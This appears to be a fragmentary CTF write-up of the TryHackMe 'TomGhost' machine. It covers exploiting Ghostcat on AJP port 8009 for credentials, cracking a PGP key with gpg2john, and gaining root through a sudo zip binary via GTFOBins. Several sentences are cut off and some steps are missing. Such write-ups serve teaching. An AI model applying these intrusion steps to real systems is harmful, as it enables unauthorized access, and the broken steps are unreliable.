TomGhost is an easy linux machine featuring a vulnerable Apache JServ Protocol 1.3 instance that can be used to read files including the source code. Inside the machine, a privileged zip binary can be used to spawn a root shell.
There are 4 open ports in the target machine.
22 - SSH
53 - DNS
8009 - Apache JServ Protocol
8080 - Apache Tomcat
I searched for exploits related to AJP and found two (2) interesting exploits. The second one was the exploit I used because I noticed the exploit's name is
Ghostcat and the machine's name is
Running the exploit will reveal a credential for
Use the credential to gain access to the machine.
You can grab the content of
user.txt in merlin's directory.
Getting Merlin's Creds
Listing the files inside skyfuck's directory will give us a
asc files. Convert the
asc to a
gpg2john and crack it:
gpg2john tryhackme.asc > hash
asc file and decrypt the
credential.pgp using the cracked passphrase.
sudo -l reveals that we can use zip binary to gain root shell.
Go to https://gtfobins.github.io/gtfobins/zip/ and follow the commands.
- Always update the software you are using and keep yourself updated.
- Review the permissions of all files, binaries, etc in the system.